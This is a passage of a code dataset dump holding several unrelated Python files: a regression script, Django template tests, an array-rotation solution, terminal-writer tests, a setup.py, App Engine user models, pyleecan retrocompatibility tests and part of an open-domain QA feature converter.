file_y_train, file_X_test.copy())\n# print(active)\n \n #Write output to file\n path1 = \"wRR_{:g}.csv\".format(lambdaNum)\n path2 = \"active_{:g}_{:g}.csv\".format(lambdaNum,varNum)\n with open(path1, \"w\") as file:\n writer = csv.writer(file, delimiter=',', lineterminator='\\n')\n for val in wRR:\n writer.writerow([val])\n \n with open(path2, \"w\") as file:\n writer = csv.writer(file, delimiter=',')\n writer.writerow(active)\n \nif __name__ == \"__main__\":\n main()","sub_path":"Columbia/Projects/Week 3 Linear Regression/0hw1_regression.py","file_name":"0hw1_regression.py","file_ext":"py","file_size_in_byte":3456,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"541798244","text":"from django.conf import settings\nfrom django.template.loader import render_to_string\n\nimport pytest\n\n\ndef test_company_with_logo():\n context = {\n 'company': {'logo': 'logo.png'},\n }\n html = render_to_string('fab/is-fab-user.html', context)\n\n assert 'logo.png' in html\n assert 'logo-placeholder.png' not in html\n\n\ndef test_company_without_logo():\n context = {\n 'company': {'logo': None},\n }\n html = render_to_string('fab/is-fab-user.html', context)\n assert 'company-logo-placeholder' in html\n\n\n@pytest.mark.parametrize('is_profile_ownerm, url,count', (\n (True, settings.FAB_ADD_USER_URL, 1),\n (True, settings.FAB_REMOVE_USER_URL, 1),\n (True, settings.FAB_TRANSFER_ACCOUNT_URL, 1),\n (False, settings.FAB_ADD_USER_URL, 0),\n (False, settings.FAB_REMOVE_USER_URL, 0),\n (False, settings.FAB_TRANSFER_ACCOUNT_URL, 0),\n))\ndef test_multi_user_is_owner(is_profile_ownerm, url, count, settings):\n context = {\n 'FAB_ADD_USER_URL': settings.FAB_ADD_USER_URL,\n 'FAB_REMOVE_USER_URL': settings.FAB_REMOVE_USER_URL,\n 'FAB_TRANSFER_ACCOUNT_URL': settings.FAB_TRANSFER_ACCOUNT_URL,\n 'is_profile_owner': is_profile_ownerm,\n }\n\n html = render_to_string('fab/is-fab-user.html', context)\n assert html.count(str(url)) == count\n","sub_path":"profile/fab/tests/test_templates.py","file_name":"test_templates.py","file_ext":"py","file_size_in_byte":1303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"419772012","text":"class Solution:\n\n def reverse(self, start, end, nums):\n while start < end:\n nums[start], nums[end] = nums[end], nums[start]\n start += 1\n end -= 1\n\n def rotate(self, nums: List[int], k: int) -> None:\n \"\"\"\n Do not return anything, modify nums in-place instead.\n \"\"\"\n\n n = len(nums)\n k %= n\n\n self.reverse(n - k, n - 1, nums)\n self.reverse(0, n - k - 1, nums)\n self.reverse(0, n - 1, nums)\n\n# while k:\n\n# last = nums[-1]\n\n# for index in range(len(nums)-1, 0, -1):\n\n# nums[index] = nums[index-1]\n\n# nums[0] = last\n# k -= 1\n\n\n# temp = nums[:]\n# n = len(nums)\n\n# for index, value in enumerate(temp):\n\n# nums[(index + k) % n] = value\n","sub_path":"189_Rotate_Array.py","file_name":"189_Rotate_Array.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"271378238","text":"import py\nimport os\nfrom py.__.io import terminalwriter \n\ndef test_terminalwriter_computes_width():\n py.magic.patch(terminalwriter, 'get_terminal_width', lambda: 42)\n try:\n tw = py.io.TerminalWriter() \n assert tw.fullwidth == 42\n finally: \n py.magic.revert(terminalwriter, 'get_terminal_width')\n\ndef test_terminalwriter_defaultwidth_80():\n py.magic.patch(terminalwriter, '_getdimensions', 
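    # the patched hook raises ZeroDivisionError, forcing the fallback to COLUMNS (default 80)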
    py.magic.patch(terminalwriter, '_getdimensions', lambda: 0/0)\n    try:\n        tw = py.io.TerminalWriter() \n        # COLUMNS comes from the environment as a string, so cast it before arithmetic.\n        assert tw.fullwidth == int(os.environ.get('COLUMNS', 80))-1\n    finally: \n        py.magic.revert(terminalwriter, '_getdimensions')\n    \n    \ndef test_terminalwriter_default_instantiation():\n    tw = py.io.TerminalWriter(stringio=True)\n    assert hasattr(tw, 'stringio')\n\nclass BaseTests:\n    def test_line(self): \n        tw = self.getwriter()\n        tw.line(\"hello\")\n        l = self.getlines()\n        assert len(l) == 1\n        assert l[0] == \"hello\\n\"\n\n    def test_sep_no_title(self):\n        tw = self.getwriter()\n        tw.sep(\"-\", fullwidth=60) \n        l = self.getlines()\n        assert len(l) == 1\n        assert l[0] == \"-\" * 60 + \"\\n\"\n\n    def test_sep_with_title(self):\n        tw = self.getwriter()\n        tw.sep(\"-\", \"hello\", fullwidth=60) \n        l = self.getlines()\n        assert len(l) == 1\n        assert l[0] == \"-\" * 26 + \" hello \" + \"-\" * 27 + \"\\n\"\n\n    def test__escaped(self):\n        tw = self.getwriter()\n        text2 = tw._escaped(\"hello\", (31))\n        assert text2.find(\"hello\") != -1\n\n    def test_markup(self):\n        tw = self.getwriter()\n        for bold in (True, False):\n            for color in (\"red\", \"green\"):\n                text2 = tw.markup(\"hello\", **{color: True, 'bold': bold})\n                assert text2.find(\"hello\") != -1\n        py.test.raises(ValueError, \"tw.markup('x', wronkw=3)\")\n        py.test.raises(ValueError, \"tw.markup('x', wronkw=0)\")\n\n    def test_line_write_markup(self):\n        tw = self.getwriter()\n        tw.hasmarkup = True\n        tw.line(\"x\", bold=True)\n        tw.write(\"x\\n\", red=True)\n        l = self.getlines()\n        assert len(l[0]) > 2, l\n        assert len(l[1]) > 2, l\n\n    def test_attr_fullwidth(self):\n        tw = self.getwriter()\n        tw.sep(\"-\", \"hello\", fullwidth=70)\n        tw.fullwidth = 70\n        tw.sep(\"-\", \"hello\")\n        l = self.getlines()\n        assert len(l[0]) == len(l[1])\n\nclass TestStringIO(BaseTests):\n    def getwriter(self):\n        self.tw = py.io.TerminalWriter(stringio=True)\n        return self.tw\n    def getlines(self):\n        io = self.tw.stringio\n        io.seek(0)\n        return io.readlines()\n\nclass TestCallableFile(BaseTests): \n    def getwriter(self):\n        self.writes = []\n        return py.io.TerminalWriter(self.writes.append)\n\n    def getlines(self):\n        io = py.std.cStringIO.StringIO()\n        io.write(\"\".join(self.writes))\n        io.seek(0)\n        return io.readlines()\n\ndef test_attr_hasmarkup():\n    tw = py.io.TerminalWriter(stringio=True)\n    assert not tw.hasmarkup\n    tw.hasmarkup = True\n    tw.line(\"hello\", bold=True)\n    s = tw.stringio.getvalue()\n    assert len(s) > len(\"hello\")\n\n    \n\n","sub_path":"InvTL/lm_py/py/io/testing/test_terminalwriter.py","file_name":"test_terminalwriter.py","file_ext":"py","file_size_in_byte":3166,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"}
{"seq_id":"117469761","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n__author__ = 'Christian Karrié '\n\nfrom distutils.core import setup\n\n# Dynamically calculate the version based on tvhm.VERSION\nversion_tuple = __import__('tvhm').VERSION\nversion = \".\".join([str(v) for v in version_tuple])\n\nsetup(\n    name = 'django-tvhmanager',\n    description = 'TVHeadend Manager',\n    version = version,\n    author = 'Christian Karrie',\n    author_email = 'ckarrie@gmail.com',\n    url = 'http://ccm.app/',\n    packages=['tvhm'],\n)\n\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":520,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"}
{"seq_id":"613190849","text":"import webapp2\nfrom google.appengine.ext import ndb\nfrom Preguntas import Pregunta\n\n\nclass Usuario(ndb.Model):\n\n
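    # (Editor's note) A Google App Engine NDB model for users; the MiPregunta model\n    # further down acts as a join table between users and their saved questions.\n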
    # The user's nickname\n    nick = ndb.StringProperty()\n\n    # The user's first name\n    name = ndb.StringProperty()\n\n    # The user's last name\n    surname = ndb.StringProperty()\n\n    # The user's password\n    password = ndb.StringProperty()\n\n    # The user's email address\n    email = ndb.StringProperty()\n\n    # Whether the user is activated or not\n    #activado = ndb.BooleanProperty()\n\n    # Role\n    rol = ndb.StringProperty()\n\n    # The user's registration date\n    date = ndb.DateTimeProperty(auto_now_add=True)\n\n    \"\"\"\n    Function that returns the user's id, as a Long\n    \"\"\"\n    def get_id(self):\n        return self.key.id()\n\n    \"\"\"\n    Function that returns the id as a string\n    \"\"\"\n    def get_id_as_str(self):\n\n        return str(self.key.id())\n\n    \"\"\"\n    Function that returns activado\n    \n    def get_activado(self):\n\n        return self.activado.id()\n    \"\"\"\n    def add_pregunta(self, pregunta):\n\n        m = MiPregunta()\n        m.id_pregunta=pregunta\n        m.id_usuario=self.get_id()\n        m.put()\n\n    def del_pregunta(self, pregunta):\n        m = MiPregunta.query(MiPregunta.id_usuario == self.get_id()).filter(MiPregunta.id_pregunta == pregunta).fetch()[0]\n        m.delete()\n\n    def pregunta_guardada(self,pregunta):\n        m = MiPregunta.query(MiPregunta.id_usuario == self.get_id()).filter(MiPregunta.id_pregunta == pregunta).count()\n        print(\"Number of matching questions: \" + str(m))\n        if m > 0:\n            return True\n        else:\n            return False\n\n    def get_preguntas(self):\n        preguntas=[]\n        mias = MiPregunta.query(MiPregunta.id_usuario==self.get_id())\n        for r in mias:\n            preguntas.append(Pregunta.get_by_id(int(r.id_pregunta)))\n        return preguntas\n\n\nclass MiPregunta(ndb.Model):\n\n    id_pregunta = ndb.GenericProperty()\n    id_usuario = ndb.GenericProperty()\n\n    def delete(self):\n        self.key.delete()\n\nclass Anonimo(ndb.Model):\n    nick = ndb.StringProperty()\n    aciertos = ndb.IntegerProperty()\n    fallos = ndb.IntegerProperty()\n    creado = ndb.DateTimeProperty(auto_now_add = True)\n","sub_path":"Clases/Usuarios.py","file_name":"Usuarios.py","file_ext":"py","file_size_in_byte":2187,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"}
{"seq_id":"60200932","text":"# -*- coding: utf-8 -*-\n\n\nfrom os.path import isfile, join\n\nimport pytest\nfrom numpy import array_equal\nfrom pyleecan.definitions import DATA_DIR\nfrom pyleecan.Functions.load import load\nfrom pyleecan.Functions.Load.retrocompatibility import is_before_version\nfrom Tests import TEST_DATA_DIR\n\n# 4: OP_matrix convertion (ndarray to object)\n# Each entry pairs a current-format \"ref\" file with a legacy \"old\" file to convert.\nOPM_list = list()\nOPM_list.append( # VarParam of VarLoadCurrent (OP Id/Iq)\n    {\n        \"ref\": join(\n            TEST_DATA_DIR,\n            \"Retrocompatibility\",\n            \"OP_matrix\",\n            \"new\",\n            \"test_multi_multi.json\",\n        ),\n        \"old\": join(\n            TEST_DATA_DIR,\n            \"Retrocompatibility\",\n            \"OP_matrix\",\n            \"old\",\n            \"test_multi_multi.json\",\n        ),\n    }\n)\nOPM_list.append( # VarLoadCurrent (I0/Phi0/Tem)\n    {\n        \"ref\": join(\n            TEST_DATA_DIR, \"Retrocompatibility\", \"OP_matrix\", \"new\", \"test_varload.json\"\n        ),\n        \"old\": join(\n            TEST_DATA_DIR, \"Retrocompatibility\", \"OP_matrix\", \"old\", \"test_varload.json\"\n        ),\n    }\n)\n\n# 3: HoleUD convertion (label update)\nhole_list = list()\nhole_list.append( # WindingCW1L\n    {\n        \"ref\": join(DATA_DIR, \"Machine\", \"BMW_i3.json\"),\n        \"old\": join(TEST_DATA_DIR, \"Retrocompatibility\", \"Label\", \"BMW_i3.json\"),\n    }\n)\n\n# VarParam convertion (rename to VarParamSweep)\nvarparam_list = list()\nvarparam_list.append(\n    {\n        \"ref\": join(\n            TEST_DATA_DIR, \"Retrocompatibility\", \"VarParam\", \"VarParam_ref.json\"\n        ),\n        \"old\": join(\n            TEST_DATA_DIR, \"Retrocompatibility\", 
\"VarParam\", \"VarParam_old.json\"\n ),\n }\n)\n\n# OptiConstraint & OptiDesignVar convertion\nopti_list = list()\nopti_list.append(\n {\n \"ref\": join(\n TEST_DATA_DIR,\n \"Retrocompatibility\",\n \"Optimisation\",\n \"OptiConstraint_and_OptiDesignVar_ref.json\",\n ),\n \"old\": join(\n TEST_DATA_DIR,\n \"Retrocompatibility\",\n \"Optimisation\",\n \"OptiConstraint_and_OptiDesignVar_old.json\",\n ),\n }\n)\n\n# 2: Winding convertion (star of slot)\nwind_list = list()\n# wind_list.append( # WindingSC + WindingDW2L\n# {\n# \"ref\": join(DATA_DIR, \"Machine\", \"SCIM_001.json\"),\n# \"old\": join(TEST_DATA_DIR, \"Retrocompatibility\", \"Winding\", \"SCIM_001.json\"),\n# }\n# )\nwind_list.append( # WindingCW1L\n {\n \"ref\": join(DATA_DIR, \"Machine\", \"SPMSM_002.json\"),\n \"old\": join(TEST_DATA_DIR, \"Retrocompatibility\", \"Winding\", \"SPMSM_002.json\"),\n }\n)\nwind_list.append( # WindingCW2LT\n {\n \"ref\": join(DATA_DIR, \"Machine\", \"SPMSM_015.json\"),\n \"old\": join(TEST_DATA_DIR, \"Retrocompatibility\", \"Winding\", \"SPMSM_015.json\"),\n }\n)\nwind_list.append( # WindingUD\n {\n \"ref\": join(DATA_DIR, \"Machine\", \"SPMSM_020.json\"),\n \"old\": join(TEST_DATA_DIR, \"Retrocompatibility\", \"Winding\", \"SPMSM_020.json\"),\n }\n)\n# wind_list.append( # WindingSC + WindingDW2L\n# {\n# \"ref\": join(DATA_DIR, \"Machine\", \"Tesla_S.json\"),\n# \"old\": join(TEST_DATA_DIR, \"Retrocompatibility\", \"Winding\", \"Tesla_S.json\"),\n# }\n# )\nwind_list.append( # WindingDW1L\n {\n \"ref\": join(DATA_DIR, \"Machine\", \"Toyota_Prius.json\"),\n \"old\": join(\n TEST_DATA_DIR, \"Retrocompatibility\", \"Winding\", \"Toyota_Prius.json\"\n ),\n }\n)\n\n\ndef test_save_OPM_None_retro():\n \"\"\"Check that the OP_matrix convertion works with None\"\"\"\n simu = load(\n join(\n TEST_DATA_DIR,\n \"Retrocompatibility\",\n \"OP_matrix\",\n \"test_OPM_None.json\",\n ),\n )\n assert simu.var_simu.OP_matrix is None\n\n\n@pytest.mark.parametrize(\"file_dict\", OPM_list)\ndef test_save_OPM_retro(file_dict):\n \"\"\"Check that the OP_matrix convertion works\"\"\"\n ref = load(file_dict[\"ref\"])\n old = load(file_dict[\"old\"])\n\n ref_var = ref.get_var_load()\n old_var = old.get_var_load()\n # Datakeeper were added between the 2 versions\n ref_var.datakeeper_list = None\n old_var.datakeeper_list = None\n\n # Check old file is converted to current version\n msg = (\n \"Error for \"\n + ref.name\n + \": \"\n + str(ref_var.compare(old_var, \"var_load\", is_add_value=True))\n )\n assert ref_var == old_var, msg\n\n\n@pytest.mark.parametrize(\"file_dict\", hole_list)\ndef test_save_load_hole_retro(file_dict):\n \"\"\"Check that the HoleUD convertion works\"\"\"\n ref = load(file_dict[\"ref\"])\n old = load(file_dict[\"old\"])\n\n hole_ref = ref.rotor.hole[0]\n hole_old = old.rotor.hole[0]\n\n # Check old file is converted to current version\n msg = \"Error for \" + ref.name + \": \" + str(hole_ref.compare(hole_old, \"hole\"))\n assert hole_ref == hole_old, msg\n\n\n@pytest.mark.parametrize(\"file_dict\", wind_list)\ndef test_save_load_wind_retro(file_dict):\n \"\"\"Check that the winding convertion works (convert to WindingUD instead of Winding)\"\"\"\n ref = load(file_dict[\"ref\"])\n old = load(file_dict[\"old\"])\n\n # Check old file is converted to current version\n if hasattr(ref.rotor, \"winding\"):\n msg = (\n \"Error for \"\n + ref.name\n + \": \"\n + str(ref.rotor.winding.compare(old.rotor.winding, \"rotor.winding\"))\n )\n assert ref.rotor.winding == old.rotor.winding, msg\n\n msg = \"Error for 
\" + ref.name\n assert ref.stator.winding.p == old.stator.winding.p, msg\n assert ref.stator.winding.qs == old.stator.winding.qs, msg\n assert ref.stator.winding.Ntcoil == old.stator.winding.Ntcoil, msg\n assert array_equal(\n ref.stator.winding.get_connection_mat(),\n -1 * old.stator.winding.get_connection_mat(),\n ) or array_equal(\n ref.stator.winding.get_connection_mat(),\n old.stator.winding.get_connection_mat(),\n ), msg\n\n\n@pytest.mark.parametrize(\"file_dict\", varparam_list)\ndef test_load_varparam(file_dict):\n \"\"\"Check that the VarParam into VarParamSweep convertion works\"\"\"\n ref = load(file_dict[\"ref\"])\n old = load(file_dict[\"old\"])\n\n # Check old file is converted to current version\n msg = \"Error for \" + ref.name + \": VarParam is not converted into VarParamSweep\"\n assert ref.name == old.name, msg\n\n\n@pytest.mark.parametrize(\"file_dict\", opti_list)\ndef test_load_opti(file_dict):\n \"\"\"Check that the OptiConstraint & OptiDesignVar convertion works\"\"\"\n ref = load(file_dict[\"ref\"])\n old = load(file_dict[\"old\"])\n\n msg = \"Error for OptiConstraint, get_variable is not converted into keeper\"\n for ii in range(len(old.problem.constraint)):\n if hasattr(old.problem.constraint[ii], \"keeper\"):\n assert (\n old.problem.constraint[ii]._keeper_str\n == ref.problem.constraint[ii]._keeper_str\n )\n else:\n assert False, msg\n\n msg = \"Error for OptiDesignVar, not converted into OptiDesignVarInterval\"\n for ii, designvar in enumerate(old.problem.design_var):\n assert isinstance(designvar, type(ref.problem.design_var[ii])), msg\n\n\ndef test_before_version():\n \"\"\"Check that we can detect previous version\"\"\"\n assert is_before_version(\"1.2.3\", \"1.2.1\")\n assert is_before_version(\"1.2.3\", \"1.1.3\")\n assert is_before_version(\"1.2.3\", \"0.2.3\")\n assert not is_before_version(\"1.2.3\", \"2.2.3\")\n assert not is_before_version(\"1.2.3\", \"1.3.0\")\n assert not is_before_version(\"1.2.3\", \"1.2.4\")\n assert not is_before_version(\"1.2.3\", \"1.2.3\")\n assert not is_before_version(\"1.2.3\", \"1.2.3.2\")\n assert is_before_version(\"1.2.3.2\", \"1.2.3\")\n\n\nif __name__ == \"__main__\":\n test_save_OPM_None_retro()\n for file_dict in OPM_list:\n test_save_OPM_retro(file_dict)\n\n # for file_dict in hole_list:\n # test_save_load_hole_retro(file_dict)\n\n # for file_dict in wind_list:\n # test_save_load_wind_retro(file_dict)\n print(\"Done\")\n","sub_path":"Tests/Functions/test_retrocompatibility.py","file_name":"test_retrocompatibility.py","file_ext":"py","file_size_in_byte":7908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"314139813","text":"# Copyright (c) 2021-present, Data-driven Intelligent System Research Center (DIRECT), National Institute of Information and Communications Technology (NICT). (Modifications for BERTAC)\n\"\"\" Modified from squad.py in the original Huggingface transformers \n for open-domain QA experiments using BERTAC\nFollowing functions and classes have been added or modified. 
\n\nfunctions:\n def openqa_convert_example_to_features_for_cnn:\n def openqa_convert_example_to_features_init:\n def openqa_convert_example_to_features_init_for_cnn:\n def openqa_convert_examples_to_features:\nclasses: \n class OpenQAExample(object):\n class OpenQAFeatures(object):\n class OpenQAFeatures_for_cnn(object):\n class OpenQASelectorResult(object):\n class OpenQAResult(object):\n\nSee \"# added by Jong-Hoon Oh\" or # added/modified by Jong-Hoon Oh\" for the places of the modification\n\"\"\"\n\nimport json\nimport logging\nimport os\nimport sys\nimport io\nfrom functools import partial\nfrom multiprocessing import Pool, cpu_count\n\nimport numpy as np\nfrom tqdm import tqdm\n\nfrom ...file_utils import is_tf_available, is_torch_available\nfrom ...tokenization_albert import whitespace_tokenize\nfrom .utils import DataProcessor\n\n\nif is_torch_available():\n import torch\n from torch.utils.data import TensorDataset\n\nif is_tf_available():\n import tensorflow as tf\n\nlogger = logging.getLogger(__name__)\nsys.stdout = io.TextIOWrapper(sys.stdout.buffer, encoding='utf-8')\n\ndef _improve_answer_span(doc_tokens, input_start, input_end, tokenizer, orig_answer_text):\n \"\"\"Returns tokenized answer spans that better match the annotated answer.\"\"\"\n tok_answer_text = \" \".join(tokenizer.tokenize(orig_answer_text))\n\n for new_start in range(input_start, input_end + 1):\n for new_end in range(input_end, new_start - 1, -1):\n text_span = \" \".join(doc_tokens[new_start : (new_end + 1)])\n if text_span == tok_answer_text:\n return (new_start, new_end)\n\n return (input_start, input_end)\n\n\ndef _check_is_max_context(doc_spans, cur_span_index, position):\n \"\"\"Check if this is the 'max context' doc span for the token.\"\"\"\n best_score = None\n best_span_index = None\n for (span_index, doc_span) in enumerate(doc_spans):\n end = doc_span.start + doc_span.length - 1\n if position < doc_span.start:\n continue\n if position > end:\n continue\n num_left_context = position - doc_span.start\n num_right_context = end - position\n score = min(num_left_context, num_right_context) + 0.01 * doc_span.length\n if best_score is None or score > best_score:\n best_score = score\n best_span_index = span_index\n\n return cur_span_index == best_span_index\n\n\ndef _new_check_is_max_context(doc_spans, cur_span_index, position):\n \"\"\"Check if this is the 'max context' doc span for the token.\"\"\"\n best_score = None\n best_span_index = None\n for (span_index, doc_span) in enumerate(doc_spans):\n end = doc_span[\"start\"] + doc_span[\"length\"] - 1\n if position < doc_span[\"start\"]:\n continue\n if position > end:\n continue\n num_left_context = position - doc_span[\"start\"]\n num_right_context = end - position\n score = min(num_left_context, num_right_context) + 0.01 * doc_span[\"length\"]\n if best_score is None or score > best_score:\n best_score = score\n best_span_index = span_index\n\n return cur_span_index == best_span_index\n\n\ndef _is_whitespace(c):\n if c == \" \" or c == \"\\t\" or c == \"\\r\" or c == \"\\n\" or ord(c) == 0x202F:\n return True\n return False\n\n# added/modified by Jong-Hoon Oh\ndef openqa_convert_example_to_features_for_cnn(example, max_seq_length, doc_stride, max_query_length, is_training):\n features = []\n # qas_id \n qas_id = example.qas_id\n # Let we have one answer_text 'start_position and end_position'\n if is_training and not example.is_impossible:\n # Get start and end position \n start_position = example.start_position\n end_position = 
example.end_position\n\n # If the answer cannot be found in the text, then skip this example.\n actual_text = \" \".join(example.doc_tokens[start_position : (end_position + 1)])\n cleaned_answer_text = \" \".join(whitespace_tokenize(example.answer_text))\n if actual_text.find(cleaned_answer_text) == -1:\n logger.warning(\"Could not find answer: '%s' vs. '%s'\", actual_text, cleaned_answer_text)\n return []\n\n tok_to_orig_index = []\n orig_to_tok_index = []\n all_doc_tokens = []\n all_doc_tokens_upper = []\n all_q_tokens_upper = []\n for (i, token) in enumerate(example.doc_tokens): # doc tokens (main body's)\n orig_to_tok_index.append(len(all_doc_tokens))\n sub_tokens = tokenizer.tokenize(token)\n for sub_token in sub_tokens:\n tok_to_orig_index.append(i)\n all_doc_tokens.append(sub_token)\n\n for (i, token) in enumerate(example.npm_doc_tokens): # npm doc tokens (input to CNN, pid part)\n sub_tokens_npm = tokenizer.tokenize_for_cnn(token) # should be input to CNN\n for sub_token in sub_tokens_npm:\n all_doc_tokens_upper.append(sub_token)\n\n for (i, token) in enumerate(example.npm_q_tokens): # npm doc tokens (input to CNN, qid part)\n sub_tokens_npm = tokenizer.tokenize_for_cnn(token) # should be input to CNN\n for sub_token in sub_tokens_npm:\n all_q_tokens_upper.append(sub_token)\n\n if is_training and not example.is_impossible:\n tok_start_position = orig_to_tok_index[example.start_position]\n if example.end_position < len(example.doc_tokens) - 1:\n tok_end_position = orig_to_tok_index[example.end_position + 1] - 1\n else:\n tok_end_position = len(all_doc_tokens) - 1\n\n (tok_start_position, tok_end_position) = _improve_answer_span(\n all_doc_tokens, tok_start_position, tok_end_position, tokenizer, example.answer_text\n )\n\n spans = []\n\n # added/modified by Jong-Hoon Oh\n # : modification for query\n # : encode_for_cnn for single input (i.e., question) does not convert qstr into cnn_qid\n truncated_query, truncated_query_tokens, truncated_query_tokens_upper = tokenizer.encode_for_cnn(example.question_text, cnn_stoi, add_special_tokens=False, max_length=max_query_length)\n sequence_added_tokens = (\n tokenizer.max_len - tokenizer.max_len_single_sentence + 1\n if \"roberta\" in str(type(tokenizer))\n else tokenizer.max_len - tokenizer.max_len_single_sentence\n )\n sequence_pair_added_tokens = tokenizer.max_len - tokenizer.max_len_sentences_pair\n\n span_doc_tokens = all_doc_tokens\n span_doc_tokens_upper = all_doc_tokens_upper\n span_q_tokens_upper = all_q_tokens_upper\n sidx = 0\n while len(spans) * doc_stride < len(all_doc_tokens):\n\n # added/modified by Jong-Hoon Oh\n # : modification for docs. 
(truncated_query_aids and truncated_query_tokens are also given)\n encoded_dict = tokenizer.encode_plus_for_cnn(\n truncated_query if tokenizer.padding_side == \"right\" else span_doc_tokens,\n truncated_query_tokens if tokenizer.padding_side == \"right\" else span_doc_tokens,\n span_q_tokens_upper if tokenizer.padding_side == \"right\" else span_doc_tokens_upper, # converson for CNN input: qid\n cnn_stoi,\n span_doc_tokens if tokenizer.padding_side == \"right\" else truncated_query,\n span_doc_tokens if tokenizer.padding_side == \"right\" else truncated_query_tokens,\n span_doc_tokens_upper if tokenizer.padding_side == \"right\" else span_q_tokens_upper, # conversion for CNN input: pid\n max_length=max_seq_length,\n return_overflowing_tokens=True,\n pad_to_max_length=True,\n stride=max_seq_length - doc_stride - len(truncated_query) - sequence_pair_added_tokens,\n truncation_strategy=\"only_second\" if tokenizer.padding_side == \"right\" else \"only_first\",\n )\n\n paragraph_len = min(\n len(all_doc_tokens) - len(spans) * doc_stride,\n max_seq_length - len(truncated_query) - sequence_pair_added_tokens,\n )\n\n if tokenizer.pad_token_id in encoded_dict[\"input_ids\"]:\n if tokenizer.padding_side == \"right\":\n non_padded_ids = encoded_dict[\"input_ids\"][: encoded_dict[\"input_ids\"].index(tokenizer.pad_token_id)]\n else:\n last_padding_id_position = (\n len(encoded_dict[\"input_ids\"]) - 1 - encoded_dict[\"input_ids\"][::-1].index(tokenizer.pad_token_id)\n )\n non_padded_ids = encoded_dict[\"input_ids\"][last_padding_id_position + 1 :]\n\n else:\n non_padded_ids = encoded_dict[\"input_ids\"]\n\n tokens = tokenizer.convert_ids_to_tokens(non_padded_ids)\n\n token_to_orig_map = {}\n for i in range(paragraph_len):\n index = len(truncated_query) + sequence_added_tokens + i if tokenizer.padding_side == \"right\" else i\n token_to_orig_map[index] = tok_to_orig_index[len(spans) * doc_stride + i]\n\n encoded_dict[\"qas_id\"] = qas_id\n encoded_dict[\"paragraph_len\"] = paragraph_len\n encoded_dict[\"tokens\"] = tokens\n encoded_dict[\"token_to_orig_map\"] = token_to_orig_map\n encoded_dict[\"truncated_query_with_special_tokens_length\"] = len(truncated_query) + sequence_added_tokens\n encoded_dict[\"token_is_max_context\"] = {}\n encoded_dict[\"start\"] = len(spans) * doc_stride\n encoded_dict[\"length\"] = paragraph_len\n\n spans.append(encoded_dict)\n\n if \"overflowing_tokens\" not in encoded_dict:\n break\n\n span_doc_tokens = encoded_dict[\"overflowing_tokens\"]\n span_doc_tokens_upper = encoded_dict[\"overflowing_tokens_upper\"]\n sidx += 1\n\n for doc_span_index in range(len(spans)):\n for j in range(spans[doc_span_index][\"paragraph_len\"]):\n is_max_context = _new_check_is_max_context(spans, doc_span_index, doc_span_index * doc_stride + j)\n index = (\n j\n if tokenizer.padding_side == \"left\"\n else spans[doc_span_index][\"truncated_query_with_special_tokens_length\"] + j\n )\n spans[doc_span_index][\"token_is_max_context\"][index] = is_max_context\n\n for span in spans:\n # Identify the position of the CLS token\n cls_index = span[\"input_ids\"].index(tokenizer.cls_token_id)\n\n # Original TF implem also keep the classification token (set to 0) (not sure why...)\n p_mask = np.array(span[\"token_type_ids\"])\n\n p_mask = np.minimum(p_mask, 1)\n\n if tokenizer.padding_side == \"right\":\n # Limit positive values to one\n p_mask = 1 - p_mask\n\n p_mask[np.where(np.array(span[\"input_ids\"]) == tokenizer.sep_token_id)[0]] = 1\n\n # Set the CLS index to '0'\n p_mask[cls_index] = 0\n\n 
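# (Editor's note) p_mask marks tokens that cannot be part of an answer with 1\n            # and answer candidates with 0; CLS stays 0 so an impossible span can point at it.\n            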
span_is_impossible = example.is_impossible\n start_position = 0\n end_position = 0\n\n if is_training and not span_is_impossible:\n # For training, if our document chunk does not contain an annotation\n # we throw it out, since there is nothing to predict.\n # 'span_is_impossible' is the flag for controlling this.\n doc_start = span[\"start\"]\n doc_end = span[\"start\"] + span[\"length\"] - 1\n out_of_span = False\n\n if not (tok_start_position >= doc_start and tok_end_position <= doc_end):\n out_of_span = True\n\n if out_of_span:\n start_position = cls_index\n end_position = cls_index\n span_is_impossible = True\n else:\n if tokenizer.padding_side == \"left\":\n doc_offset = 0\n else:\n doc_offset = len(truncated_query) + sequence_added_tokens\n\n start_position = tok_start_position - doc_start + doc_offset\n end_position = tok_end_position - doc_start + doc_offset\n\n\n # added/modified by Jong-Hoon Oh\n features.append(\n OpenQAFeatures_for_cnn(\n span[\"input_ids\"],\n span[\"input_qids\"],\n span[\"input_pids\"],\n span[\"qmasks\"],\n span[\"pmasks\"],\n span[\"attention_mask\"],\n span[\"token_type_ids\"],\n cls_index,\n p_mask.tolist(),\n example_index=0, # Don't set unique_id and example_index here. \n unique_id=0,\n paragraph_len=span[\"paragraph_len\"],\n token_is_max_context=span[\"token_is_max_context\"],\n tokens=span[\"tokens\"],\n token_to_orig_map=span[\"token_to_orig_map\"],\n start_position=start_position,\n end_position=end_position,\n is_impossible=span_is_impossible,\n qas_id=qas_id,\n )\n )\n return features\n\n\n# added/modified by Jong-Hoon Oh\ndef openqa_convert_example_to_features_init(tokenizer_for_convert):\n global tokenizer\n tokenizer = tokenizer_for_convert\n\n# added/modified by Jong-Hoon Oh\ndef openqa_convert_example_to_features_init_for_cnn(tokenizer_for_convert, cnn_stoi_for_convert):\n global tokenizer\n tokenizer = tokenizer_for_convert\n global cnn_stoi\n cnn_stoi = cnn_stoi_for_convert\n\n# added/modified by Jong-Hoon Oh\ndef openqa_convert_examples_to_features(\n examples, tokenizer, cnn_stoi, max_seq_length, doc_stride, max_query_length, is_training, return_dataset=False, threads=1\n):\n \"\"\"\n Converts a list of examples into a list of features that can be directly given as input to a model.\n It is model-dependant and takes advantage of many of the tokenizer's features to create the model's inputs.\n\n Args:\n examples: list of :class:`~transformers.data.processors.openqa.OpenQAExample`\n tokenizer: an instance of a child of :class:`~transformers.PreTrainedTokenizer`\n cnn_stoi: mapping table from string to index for the CNN vocab.\n 